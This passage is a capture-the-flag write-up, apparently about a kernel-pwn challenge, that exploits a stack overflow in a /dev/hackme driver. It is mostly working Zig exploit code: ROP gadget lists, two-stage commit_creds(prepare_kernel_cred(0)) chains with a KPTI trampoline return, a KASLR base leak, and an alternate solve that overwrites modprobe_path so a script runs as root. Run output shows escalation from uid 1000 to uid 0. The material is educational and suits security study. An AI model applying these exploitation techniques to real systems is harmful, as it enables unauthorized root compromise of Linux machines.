ropr --range=0xffffffff81000000-0xffffffff81400dc6 -R '^(pop rdi;|pop rax;|pop rbx;|pop rdx;|push rax;|mov eax, \[rax+.{3,5}\]; .*|add (r|e)ax, (r|e)di;) ret;' vmlinux
0xffffffff81004aae: mov eax, [rax+0x10]; pop rbp; ret;
0xffffffff81004d11: pop rax; ret;
0xffffffff81006123: push rax; ret;
0xffffffff810075d0: pop rbx; ret;
0xffffffff81007616: pop rdx; ret;
0xffffffff8100767c: pop rdi; ret;
0xffffffff8100dad3: mov eax, [rax+0xe0]; pop rbp; shr eax, 1; and eax, 1; ret;
0xffffffff81012551: add rax, rdi; ret;
0xffffffff81012552: add eax, edi; ret;
I couldn’t find a way to move the result of prepare_kernel_cred(0) into rdi
with the gadgets we have to work with, so I opted to split the payload into 2 pieces.
Zig
// Gadget and symbol addresses relative to the default kernel base
// 0xffffffff81000000. They are `var` so adjust_offsets() can add the KASLR
// slide at runtime. All gadgets come from the region searched with ropr above.
var POP_RDI: u64 = 0xffffffff8100767c;
var POP_RAX: u64 = 0xffffffff81004d11;
var POP_RBX: u64 = 0xffffffff810075d0;
var POP_RDX: u64 = 0xffffffff81007616;
var PUSH_RAX: u64 = 0xffffffff81006123; // push rax; ret  (i.e. jump to rax)
var MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP: u64 = 0xffffffff81004aae; // mov eax, [rax+0x10]; pop rbp; ret
var ADD_RAX_RDI: u64 = 0xffffffff81012551;
var ADD_EAX_EDI: u64 = 0xffffffff81012552;
var KPTI_TRAMPOLINE: u64 = 0xffffffff81200f26;
var KSYMTAB_PREPARE_KERNEL_CRED: u64 = 0xffffffff81f8d4fc;
var KSYMTAB_COMMIT_CREDS: u64 = 0xffffffff81f87d90;
/// Stage 1: resolve prepare_kernel_cred through its __ksymtab entry, call it
/// with rdi = 0, then return to the userland function ret2ROP with
/// rax = result, rbx = fd and rdx = canary so stage 2 can be launched.
fn ropchain1(writer: anytype, fd: std.posix.fd_t, canary: u64) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RAX,
KSYMTAB_PREPARE_KERNEL_CRED-0x10, // the load gadget reads from [rax+0x10]
MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP, // eax = first 32-bit field of the ksymtab entry
0, // junk
POP_RDI,
KSYMTAB_PREPARE_KERNEL_CRED,
ADD_EAX_EDI, // eax = low 32 bits of (entry address + offset)
POP_RDI,
(KSYMTAB_PREPARE_KERNEL_CRED >> 32) << 32, // upper 32 bits of the entry address
ADD_RAX_RDI, // rax = full 64-bit address of prepare_kernel_cred
POP_RDI,
0, // rdi = 0, the argument for prepare_kernel_cred
PUSH_RAX, // call prepare_kernel_cred; it returns to the next word
POP_RBX,
@as(u64, @intCast(fd)),
POP_RDX,
canary,
KPTI_TRAMPOLINE,
0, // junk
0, // junk
@intFromPtr(&ret2ROP),
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
/// Userland landing pad between the two ROP stages.
/// Reads rax, rbx and rdx through empty asm statements with output constraints,
/// expecting the values ropchain1 left there (cred pointer, fd, canary), and
/// launches stage 2 with them.
/// NOTE(review): this relies on the compiler not touching those registers in
/// the function prologue and on the KPTI trampoline preserving rbx/rdx — fragile.
fn ret2ROP() void {
const creds: u64 = asm volatile("" : [ret] "={rax}" (-> u64));
const fd: u64 = asm volatile("" : [fd] "={rbx}" (-> u64));
const canary: u64 = asm volatile("" : [canary] "={rdx}" (-> u64));
runROPChain(@as(std.posix.fd_t, @intCast(fd)), canary, creds) catch unreachable;
unreachable;
}
/// Stage 2: resolve commit_creds through its __ksymtab entry, call it with
/// rdi = `creds_addr` (the pointer returned by prepare_kernel_cred in stage 1),
/// then return to the userland function ret2win through the KPTI trampoline.
fn ropchain2(writer: anytype, creds_addr: u64) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RAX,
KSYMTAB_COMMIT_CREDS-0x10, // the load gadget reads from [rax+0x10]
MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP, // eax = first 32-bit field of the ksymtab entry
0, // junk
POP_RDI,
KSYMTAB_COMMIT_CREDS,
ADD_EAX_EDI, // eax = low 32 bits of (entry address + offset)
POP_RDI,
(KSYMTAB_COMMIT_CREDS >> 32) << 32, // upper 32 bits of the entry address
ADD_RAX_RDI, // rax = full 64-bit address of commit_creds
POP_RDI,
creds_addr,
PUSH_RAX, // call commit_creds(creds_addr)
KPTI_TRAMPOLINE,
0, // junk
0, // junk
@intFromPtr(&ret2win),
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
/// Tagged union naming the input each ROP stage needs.
/// NOTE(review): not referenced by any code shown in this listing;
/// runROPChain takes an optional `creds_addr` instead.
const ROPChain = union(enum) {
canary: u64,
creds_addr: u64,
};
/// Builds the overflow payload and sends it to the driver.
///
/// Parameters:
///   fd         - open descriptor for /dev/hackme.
///   canary     - leaked stack canary, written back unchanged.
///   creds_addr - null to run stage 1 (ropchain1); otherwise the cred pointer
///                from stage 1, which selects stage 2 (ropchain2).
///
/// On success control never comes back here: the flush triggers the overflow
/// and the kernel returns into the chain. Errors from building or writing the
/// payload are propagated to the caller.
fn runROPChain(fd: std.posix.fd_t, canary: u64, creds_addr: ?u64) !void {
    const file = (std.fs.File{ .handle = fd }).writer();
    // Assemble everything in a buffered writer so the payload reaches the
    // driver when flushed instead of piece by piece.
    var bw = std.io.bufferedWriter(file);
    const writer = bw.writer();

    // Payload layout: filler for tmp | canary | 24 bytes of filler | ROP chain.
    try writer.writeByteNTimes(0, tmp_size);
    try writer.writeAll(std.mem.asBytes(&canary));
    try writer.writeByteNTimes(0, (8 * 3));

    // Both chain builders return an error union; it must be handled with
    // `try`, otherwise the call does not compile.
    if (creds_addr) |caddr| {
        try ropchain2(writer, caddr);
    } else {
        try ropchain1(writer, fd, canary);
    }

    try bw.flush();
    unreachable;
}
/// Rebases every gadget and ksymtab address by adding `kaslr_offset`, the
/// difference between the running kernel's base and the base the hard-coded
/// values assume. Call once, before building any ROP chain.
fn adjust_offsets(kaslr_offset: u64) void {
    const targets = [_]*u64{
        &POP_RDI,
        &POP_RAX,
        &POP_RBX,
        &POP_RDX,
        &PUSH_RAX,
        &MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP,
        &ADD_RAX_RDI,
        &ADD_EAX_EDI,
        &KPTI_TRAMPOLINE,
        &KSYMTAB_PREPARE_KERNEL_CRED,
        &KSYMTAB_COMMIT_CREDS,
    };
    var idx: usize = 0;
    while (idx < targets.len) : (idx += 1) {
        targets[idx].* += kaslr_offset;
    }
}
Now we just need a leak to defeat regular KASLR.
Zig
/// Reads up to 350 bytes from the driver (well past the 128-byte tmp array)
/// and hex-dumps whatever came back, for spotting kernel pointers on the stack.
fn dumpStack(fd: std.posix.fd_t) !void {
    var leak: [350]u8 = undefined;
    const got = try std.posix.read(fd, &leak);
    const seen = leak[0..got];
    std.debug.dumpHex(seen);
}
Let’s compare the output of dumpStack before and after a reboot to see what remains the same:
Diff
1,22c1,22
< 00007ffccba8e082 20 10 60 87 D3 8C FF FF E0 0F 00 00 00 00 00 00 .`.............
< 00007ffccba8e092 00 7D 35 B9 68 99 63 84 10 D6 CA 86 D3 8C FF FF .}5.h.c.........
< 00007ffccba8e0a2 68 FE 1B 80 1A B9 FF FF 04 00 00 00 00 00 00 00 h...............
< 00007ffccba8e0b2 00 D6 CA 86 D3 8C FF FF F0 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e0c2 00 D6 CA 86 D3 8C FF FF 80 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e0d2 D7 7B E8 A3 FF FF FF FF D7 7B E8 A3 FF FF FF FF .{.......{......
< 00007ffccba8e0e2 00 D6 CA 86 D3 8C FF FF 00 00 00 00 00 00 00 00 ................
< 00007ffccba8e0f2 82 E0 A8 CB FC 7F 00 00 A0 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e102 00 7D 35 B9 68 99 63 84 5E 01 00 00 00 00 00 00 .}5.h.c.^.......
< 00007ffccba8e112 00 00 00 00 00 00 00 00 D8 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e122 2F 28 09 A4 FF FF FF FF 00 D6 CA 86 D3 8C FF FF /(␉.............
< 00007ffccba8e132 00 D6 CA 86 D3 8C FF FF 82 E0 A8 CB FC 7F 00 00 ................
< 00007ffccba8e142 5E 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ^...............
< 00007ffccba8e152 20 FF 1B 80 1A B9 FF FF A7 22 1A A4 FF FF FF FF ........"......
< 00007ffccba8e162 F1 11 23 A4 FF FF FF FF 00 00 00 00 00 00 00 00 ..#.............
< 00007ffccba8e172 00 7D 35 B9 68 99 63 84 58 FF 1B 80 1A B9 FF FF .}5.h.c.X.......
< 00007ffccba8e182 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
< 00007ffccba8e192 00 00 00 00 00 00 00 00 30 FF 1B 80 1A B9 FF FF ........0.......
< 00007ffccba8e1a2 DA 19 2E A4 FF FF FF FF 48 FF 1B 80 1A B9 FF FF ........H.......
< 00007ffccba8e1b2 57 A1 A0 A3 FF FF FF FF 00 00 00 00 00 00 00 00 W...............
< 00007ffccba8e1c2 00 00 00 00 00 00 00 00 8C 00 C0 A3 FF FF FF FF ................
< 00007ffccba8e1d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..............
---
> 00007ffcef2175d2 20 20 60 47 F0 90 FF FF E0 0F 00 00 00 00 00 00 `G............
> 00007ffcef2175e2 00 0E 76 FC EA 35 42 B0 10 DC CA 46 F0 90 FF FF ..v..5B....F....
> 00007ffcef2175f2 68 7E 1C C0 28 A9 FF FF 04 00 00 00 00 00 00 00 h~..(...........
> 00007ffcef217602 00 DC CA 46 F0 90 FF FF F0 7E 1C C0 28 A9 FF FF ...F.....~..(...
> 00007ffcef217612 00 DC CA 46 F0 90 FF FF 80 7E 1C C0 28 A9 FF FF ...F.....~..(...
> 00007ffcef217622 97 45 2E B3 FF FF FF FF 97 45 2E B3 FF FF FF FF .E.......E......
> 00007ffcef217632 00 DC CA 46 F0 90 FF FF 00 00 00 00 00 00 00 00 ...F............
> 00007ffcef217642 D2 75 21 EF FC 7F 00 00 A0 7E 1C C0 28 A9 FF FF .u!......~..(...
> 00007ffcef217652 00 0E 76 FC EA 35 42 B0 5E 01 00 00 00 00 00 00 ..v..5B.^.......
> 00007ffcef217662 00 00 00 00 00 00 00 00 D8 7E 1C C0 28 A9 FF FF .........~..(...
> 00007ffcef217672 AF E5 28 B3 FF FF FF FF 00 DC CA 46 F0 90 FF FF ..(........F....
> 00007ffcef217682 00 DC CA 46 F0 90 FF FF D2 75 21 EF FC 7F 00 00 ...F.....u!.....
> 00007ffcef217692 5E 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ^...............
> 00007ffcef2176a2 20 7F 1C C0 28 A9 FF FF C7 2E 70 B3 FF FF FF FF ...(.....p.....
> 00007ffcef2176b2 B1 59 70 B3 FF FF FF FF 00 00 00 00 00 00 00 00 .Yp.............
> 00007ffcef2176c2 00 0E 76 FC EA 35 42 B0 58 7F 1C C0 28 A9 FF FF ..v..5B.X...(...
> 00007ffcef2176d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00007ffcef2176e2 00 00 00 00 00 00 00 00 30 7F 1C C0 28 A9 FF FF ........0...(...
> 00007ffcef2176f2 3A 14 4C B3 FF FF FF FF 48 7F 1C C0 28 A9 FF FF :.L.....H...(...
> 00007ffcef217702 57 A1 C0 B2 FF FF FF FF 00 00 00 00 00 00 00 00 W...............
> 00007ffcef217712 00 00 00 00 00 00 00 00 8C 00 E0 B2 FF FF FF FF ................
> 00007ffcef217722 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..............
Notice the values buf[304..304+8] and buf[328..328+8]: across the different runs only the 3rd and 4th least significant bytes differ (0xffffffffa3a0a157 vs. 0xffffffffb2c0a157, and 0xffffffffa3c0008c vs. 0xffffffffb2e0008c), while the low 2 bytes stay fixed. Furthermore, the two values are the same distance apart in both runs, so it’s very likely that they are each a constant offset from the kernel base. As it turns out, masking out the lower 2 bytes of buf[304..304+8] yields the kernel base address (source: trust me bro)!
Zig
/// Leaks the kernel base address through the driver's over-long read.
///
/// Reads 312 bytes from `fd` and takes the 8-byte value at offset 304, which
/// the stack dumps show to be a kernel text pointer at a fixed offset from the
/// base. Clearing its low 16 bits yields the base.
/// Fails with `error.ShortRead` if fewer bytes were returned than requested,
/// since the pointer bytes would then be uninitialised garbage.
fn leakBaseAddress(fd: std.posix.fd_t) !u64 {
    var buf: [304 + 8]u8 = undefined;
    const got = try std.posix.read(fd, &buf);
    // read() may legally return less than requested; never interpret
    // bytes that were not actually filled in.
    if (got < buf.len) return error.ShortRead;
    const ret = std.mem.bytesAsValue(u64, buf[304..]).*;
    // Drop the low 2 bytes (the pointer's offset within the kernel image).
    return (ret >> 16) << 16;
}
We just need to call adjust_offsets with the KASLR slide (the leaked kernel base minus the default base 0xffffffff81000000 that the hard-coded addresses assume), and bob’s our uncle.
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x6071ec017b6ac500
[INFO] Kernel base: 0xffffffffa4200000
[INFO] You won!!
whoami: unknown uid 0
Alternate solve: modprobe_path
This is not an alternative bypass to KASLR, but rather a different attack vector to indirectly achieve privilege escalation without putzing with commit_creds(prepare_kernel_cred(0)).
Basically, when execve’ing a binary with magic bytes the kernel doesn’t recognize, eventually the following will get called:
Bash
$modprobe_path -q -- binfmt-$MAGIC
Where $modprobe_path
is the string stored in the modprobe_path
kernel symbol, and $MAGIC
is whatever the magic bytes of the file are.
So if we overwrite modprobe_path
, we can get the kernel to execute a file we control.
Bash
cat /proc/kallsyms | grep -e 'modprobe_path'
ffffffff82061820 D modprobe_path
Bash
ropr --range=0xffffffff81000000-0xffffffff81400dc6 -R '^(pop rdi;|pop rax;|mov \[rdi+.{3,5}\], ...;) ret;' vmlinux
0xffffffff81004d11: pop rax; ret;
0xffffffff8100767c: pop rdi; ret;
0xffffffff81012833: mov [rdi+0x10], r8d; ret;
0xffffffff81012834: mov [rdi+0x10], eax; ret;
Zig
// Gadget and symbol addresses relative to the default kernel base; `var` so
// they can be rebased once the KASLR slide is known.
var POP_RDI: u64 = 0xffffffff8100767c;
var POP_RAX: u64 = 0xffffffff81004d11;
var MOV_ADDROF_RDI_PLUS_16_EAX: u64 = 0xffffffff81012834; // mov [rdi+0x10], eax; ret
var MODPROBE_PATH: u64 = 0xffffffff82061820;
var KPTI_TRAMPOLINE: u64 = 0xffffffff81200f26;
/// Writes the ROP chain that overwrites the kernel's modprobe_path string with
/// "/tmp/a" and then returns to the userland function ret2win.
/// The store gadget writes 32 bits at [rdi+0x10], so the string is written in
/// two 4-byte halves and rdi is biased by -0x10 each time.
fn ropchain(writer: anytype) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RAX,
std.mem.readInt(u32, "/tmp", .little), // first four bytes of the path
POP_RDI,
MODPROBE_PATH-0x10,
MOV_ADDROF_RDI_PLUS_16_EAX,
POP_RAX,
std.mem.readInt(u32, "/a" ++ &[_]u8{0} ** 2, .little), // "/a" plus NUL terminator
POP_RDI,
MODPROBE_PATH-0x10+0x4,
MOV_ADDROF_RDI_PLUS_16_EAX,
KPTI_TRAMPOLINE,
0, // junk
0, // junk
@intFromPtr(&ret2win),
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
/// Userland landing pad for the modprobe_path solve.
///
/// Creates the two files the attack needs:
///   /tmp/a       - the script the kernel will run in place of modprobe; it
///                  records `whoami` output in /tmp/its-a-me.
///   /tmp/unknown - a file whose first four bytes (0xff) are not a recognised
///                  executable format, so executing it makes the kernel invoke
///                  modprobe_path.
///
/// Each file handle is closed via `defer` in its own scope, so it is released
/// even when the write fails, and /tmp/a is still closed before /tmp/unknown
/// is created.
fn ret2win() !void {
    std.debug.print("[INFO] You won!!\n", .{});

    {
        const tmpa = try std.fs.cwd().createFile(
            "/tmp/a",
            .{
                .read = true,
                .mode = 0o777,
            },
        );
        defer tmpa.close();
        try tmpa.writeAll(
            \\#!/bin/sh
            \\whoami &> /tmp/its-a-me
            \\chmod 777 /tmp/its-a-me
        );
    }

    {
        const unknown = try std.fs.cwd().createFile(
            "/tmp/unknown",
            .{
                .read = true,
                .mode = 0o777,
            },
        );
        defer unknown.close();
        try unknown.writeAll(&[_]u8{0xff} ** 4);
    }
}
Bash
whoami
./exploit
# execute bogus file
/tmp/unknown &> /dev/null
cat /tmp/its-a-me
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x0743fe8b3c798800
[INFO] Kernel base: 0xffffffff85800000
[INFO] You won!!
whoami: unknown uid 0
Resources
This was my first time solving a kernel pwn challenge, and I was initially quite lost as to how to even approach it. I found the following resources invaluable:
- PAWNYABLE Holstein v1
- Really good resource for learning the basics of kernel pwn and setting up your environment for kernel debugging.
- Other kernel-rop writeups
- The writeups published by Midas and 0x434b were super helpful for learning bypasses to different mitigations and alternative solutions to arrive at privileged code execution.
For those curious, I wrote the exploits and this post using Emacs org-mode. Taking the time to get it setup was a little annoying, but being able to run arbitrary commands in the challenge VM (not to mention compiling an exploit and regenerating the initramfs) with a single keystroke hugely improved my productivity.
Using Zig instead of C was also quite nice because of a (imo) much better standard library and quick compile times.
Even if using C, using zig cc to easily target x86_64-linux-musl
is super convenient.
If you want to program at the edge of your abilities, consider applying to the Recurse Center.